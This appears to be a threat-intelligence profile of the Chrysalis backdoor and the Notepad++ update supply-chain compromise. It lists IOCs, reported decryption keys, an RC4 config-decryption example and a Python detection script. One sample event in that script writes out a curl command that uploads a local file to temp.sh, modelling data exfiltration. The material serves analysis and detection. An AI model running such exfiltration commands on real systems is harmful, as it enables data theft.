Chrysalis
Chrysalis is a previously undocumented custom Windows backdoor attributed in public reporting to the Chinese espionage group Lotus Blossom, also tracked as Raspberry Typhoon, Billbug, Spring Dragon, Thrip, Lotus Panda, Bronze Elgin, Red Salamander, and KTA529. It was publicly linked to the June-December 2025 compromise of Notepad++ update infrastructure, in which the attackers selectively redirected WinGUp updater traffic and delivered trojanized updates to targeted victims. The malware was deployed via DLL sideloading as part of a multi-stage supply-chain intrusion, often alongside Cobalt Strike Beacon, against government, financial, IT, telecommunications, aviation, cloud-hosting, energy, manufacturing, and software-development organizations, with victims reported in Vietnam, the Philippines, El Salvador, Australia, the United States, Europe, and Southeast Asia more broadly.
In the infection chain designated Infection Chain 3, the attackers dropped three files into %APPDATA%\Bluetooth: BluetoothService.exe, a malicious log.dll, and an encrypted payload file named BluetoothService. BluetoothService.exe is a legitimate Bitdefender Submission Wizard executable renamed to that filename and abused to sideload log.dll from the same directory. The malicious DLL exports LogInit and LogWrite; once loaded, it reads the encrypted payload, decrypts it, and executes Chrysalis. Reporting also ties a Warbird-based loader to Chrysalis, and one source notes the use of Microsoft's Warbird code-protection framework together with custom API hashing as evasion measures. Separately, an attack-simulation artifact (not a sample from the campaign) models the shellcode-compilation step by running a binary named svchost.exe with TinyCC flags such as -nostdlib -run; the IOC list records that svchost.exe as a masqueraded loader binary under C:\ProgramData\USOShared, not the Windows service host.
Capabilities described in public reporting include persistence via registry-key modification or installation of a new service, host and system information collection, remote command execution, a fully interactive reverse shell, remote process execution, file read, write, and upload operations, file exfiltration, and a self-destruct sequence. The implant operates in memory, uses custom cryptography, and is designed for persistent, long-term espionage. One source states that the main module is decrypted with XOR using the key "gQ2JR&9;" combined with additional arithmetic operations, and that the configuration data is decrypted with RC4 using the key "qwhvb^435h&*7".
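As an added example (not code from this page or from any vendor report), the Python below implements RC4 with the reported configuration key and shows how an analyst would apply it to a recovered configuration blob. The blob is constructed here by encrypting an invented key=value configuration with the same key, because the real ciphertext is not on the page; the key=value layout is an assumption. The XOR-plus-arithmetic scheme for the main module is not specified closely enough to reproduce and is left out. Standard RC4 test vectors are used to confirm the implementation before trusting its output on anything from a sample.

```python
"""RC4 configuration decryption as reported for Chrysalis.

Added example, not code from the original page or from any vendor report.
Public reporting gives only the RC4 key ("qwhvb^435h&*7"); the encrypted
configuration blob itself is not on the page, so the blob below is
CONSTRUCTED by encrypting an invented configuration with that key.
"""

CHRYSALIS_RC4_KEY = b"qwhvb^435h&*7"   # key quoted in public reporting


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same op."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    # Key-scheduling algorithm: permute S under the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation: one keystream byte XORed per data byte.
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def decrypt_config(blob: bytes, key: bytes = CHRYSALIS_RC4_KEY) -> dict:
    """Decrypt an RC4 config blob and split it into key=value fields.

    The "key=value;" layout is an ASSUMPTION for this example; the real
    Chrysalis configuration format is not described on the page.
    """
    plain = rc4(key, blob)
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        # Wrong key or extra wrapping layer: RC4 output then looks random.
        raise ValueError("decryption did not yield printable ASCII") from None
    fields = {}
    for item in filter(None, text.split(";")):
        if "=" not in item:
            raise ValueError(f"malformed field: {item!r}")
        k, v = item.split("=", 1)
        fields[k.strip()] = v.strip()
    return fields


# Constructed stand-in for a recovered config. The c2 value is the
# configuration URL quoted in public reporting (kept defanged); the other
# fields are invented for the example.
SAMPLE_CONFIG_PLAINTEXT = (
    b"c2=https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf9cf0-6d8e24aaa821;"
    b"sleep=60;ua=Mozilla/5.0;"
)
SAMPLE_CONFIG_BLOB = rc4(CHRYSALIS_RC4_KEY, SAMPLE_CONFIG_PLAINTEXT)


if __name__ == "__main__":
    for k, v in decrypt_config(SAMPLE_CONFIG_BLOB).items():
        print(f"{k:>6} = {v}")
```

If the RC4 output for a suspected configuration blob is not printable, either the key has changed between samples or the blob sits under another layer (the page describes a separate XOR-plus-arithmetic scheme for the main module); treat a failed decode as a prompt to re-examine the sample rather than as a negative result.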
High-confidence infrastructure and indicators published for this activity include the malicious update.exe sample (SHA-256 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566); C2 and related infrastructure at 45.76.155.202, 45.77.31.210, 95.179.213.0, cdncheck.it.com, safe-dns.it.com, api.skycloudcenter.com, api.wiresguard.com, 59.110.7.32:8880, and 124.222.137.114:9999; and a Chrysalis configuration URL of https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf9cf0-6d8e24aaa821. Host artifacts tied to delivery include %APPDATA%\Bluetooth\BluetoothService.exe, log.dll, the encrypted BluetoothService payload, and the malicious update.exe delivered through the compromised Notepad++ update channel.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor.
Groups observed using it
2 distinct threat actors attributed by public researchers.
This incident also arrives against a backdrop of Notepad++ already having faced a serious supply chain attack between June and December 2025, where state-sponsored Chinese hackers from the Lotus Blossom group compromised the official Notepad++ update infrastructure and delivered a malicious backdoor called Chrysalis to targeted users.
Threat group KTA529 (also known as Lotus Blossom, Spring Dragon, Billbug and Thrip) compromised Notepad++ hosting infrastructure between June and December 2025, intercepting update traffic to deliver a previously undocumented backdoor named CHRYSALIS.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Threat actors routinely use this technique, known as brand impersonation or typosquatting, to serve malware, infostealers, or remote access trojans under the cover of a well-known application.
"The attackers intercepted and selectively redirected update requests from certain users to malicious servers"
Initial Access
4 techniques
Notepad++ already having faced a serious supply chain attack between June and December 2025, where state-sponsored Chinese hackers from the Lotus Blossom group compromised the official Notepad++ update infrastructure and delivered a malicious backdoor called Chrysalis to targeted users.
"traffic tied to WinGUp, which updated the software, 'was occasionally redirected to malicious servers, resulting in the download of compromised executables'"
Execution
4 techniques
Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration.
Lotus Blossom TinyCC shellcode execution simulation: svchost.exe executed with TinyCC compiler flags (-nostdlib -run) to simulate the Chrysalis backdoor's shellcode compilation technique.
...Notepad++ ... intercept or redirect update traffic to download and execute an attacker-controlled installer and lead to arbitrary code execution with the privileges of the user.
Persistence
2 techniques
Privilege Escalation
3 techniques
"decrypt and execute the shellcode"; "execute shellcode"; "Warbird ... to execute shellcode"
Stealth
9 techniques
"it uses Microsoft's proprietary and undocumented Warbird code protection and obfuscation framework"
C:\ProgramData\USOShared\svchost.exe -nostdlib (masqueraded loader binary); update.exe (malicious updater)
"decrypt and execute the shellcode"; "execute shellcode"; "Warbird ... to execute shellcode"
C:\Users\*\AppData\Local\Temp\u.bat (cleanup / self-delete script)
...Bluetooth\Bluetooth (encrypted shellcode blob, no extension)
"Detects payload bytes in first 0x490 bytes in clipc.dll Warbird technique... scope = 'Microsoft signed DLL - clipc.dll'"
C:\Users\*\AppData\Roaming\Bluetooth\log.dll (malicious sideloaded DLL); ...Adobe\Scripts\alien.dll (malicious DLL)
"Find Warbird clipc.dll shellcode loader strings" and YARA rules: "...Shellcode_Loader..." and "...Warbird... shellcode loader"
Credential Access
1 technique
Discovery
2 techniques
Collection
1 technique
Command and Control
3 techniques
"including command-and-control communications tied to api.skycloudcenter.com"
YARA rule includes domains/paths such as "api.skycloudcenter.com" and URIs like "/api/update/v1", "/api/FileUpload/submit", "/api/getInfo/v1"
The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
Exfiltration
2 techniques
Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration... Block or alert on curl.exe uploading files to temp[.]sh
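As an added example that is not the Insikt Group Sigma rules or any vendor code, the Python below expresses the same two detections over Sysmon-style process-creation events (Image, CommandLine, ParentImage) and runs them against constructed sample events. The on-disk path of update.exe, the benign control events, and the set of curl flags treated as uploads are assumptions made for the example; the page itself names only the reconnaissance commands, the update.exe parent, and temp.sh as the staging host.

```python
"""Detections for the post-compromise activity reported around the malicious
Notepad++ update.exe: reconnaissance commands spawned by update.exe, and
curl.exe uploading files to temp.sh.

Added example, not the Insikt Group Sigma rules or any vendor code. Events
are dicts with Sysmon Event ID 1-style fields; the samples are CONSTRUCTED.
"""
from __future__ import annotations

import ntpath
import shlex
from urllib.parse import urlsplit

RECON_BINARIES = {"whoami.exe", "tasklist.exe", "systeminfo.exe", "netstat.exe"}
SUSPECT_PARENTS = {"update.exe"}          # parent named in public reporting
EXFIL_HOSTS = {"temp.sh"}                 # staging host named in public reporting
# curl switches that send a local file or body (assumed list for this example).
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _split_cmdline(cmdline: str) -> list[str]:
    try:
        return shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:
        return cmdline.split()                     # unbalanced quotes: degrade gracefully


def _url_hosts(argv: list[str]) -> set[str]:
    """Hostnames from URL-looking arguments (curl accepts bare host/path too)."""
    hosts = set()
    for tok in argv:
        tok = tok.strip("\"'")
        if tok.startswith("-") or "/" not in tok:
            continue
        host = urlsplit(tok if "://" in tok else "//" + tok).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def classify(event: dict) -> list[str]:
    """Return the detection names an event triggers, in a fixed order."""
    hits = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    argv = _split_cmdline(event.get("CommandLine", ""))

    # 1. The updater binary performing host reconnaissance.
    if parent in SUSPECT_PARENTS and image in RECON_BINARIES:
        hits.append("updater_recon")
    # 2a. The updater binary invoking curl at all.
    if parent in SUSPECT_PARENTS and image == "curl.exe":
        hits.append("updater_curl")
    # 2b. Any curl.exe upload whose target host is a known staging service.
    if image == "curl.exe" and UPLOAD_FLAGS.intersection(argv) \
            and _url_hosts(argv) & EXFIL_HOSTS:
        hits.append("curl_exfil_upload")
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and detections for every event that triggered at least one."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := classify(ev))]


# Constructed events; the update.exe path is an assumption for the example.
_UPDATER = r"C:\Users\alice\AppData\Local\Temp\update.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami",
     "ParentImage": _UPDATER},
    {"Image": r"C:\Windows\System32\NETSTAT.EXE", "CommandLine": "netstat -ano",
     "ParentImage": _UPDATER},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Users\alice\AppData\Local\Temp\info.txt" https://temp.sh/upload',
     "ParentImage": _UPDATER},
    # Benign control: an administrator running netstat from a shell.
    {"Image": r"C:\Windows\System32\netstat.exe", "CommandLine": "netstat -ano",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign control: curl downloading (not uploading) from the same host.
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -O https://temp.sh/abc/file.zip",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Gating the reconnaissance rule on the update.exe parent is what separates the campaign's behaviour from an administrator running netstat -ano, and matching the staging host by parsed hostname rather than substring keeps lookalike domains and downloads from the same host out of the upload alert.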
Impact
1 technique
"attackers... allowing them to maliciously redirect traffic until Dec. 2, 2025"
IOCs tracked for this family
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
44 sources tracked across advisories, community write-ups, and news.
A malicious backdoor delivered via a supply chain compromise of the official Notepad++ update infrastructure to targeted users.
A custom backdoor delivered through the compromised Notepad++ update mechanism during Lotus Blossom's campaign.
Backdoor deployed via a Notepad++ supply chain compromise, enabling system information collection, remote command execution, and file exfiltration once a host is infected.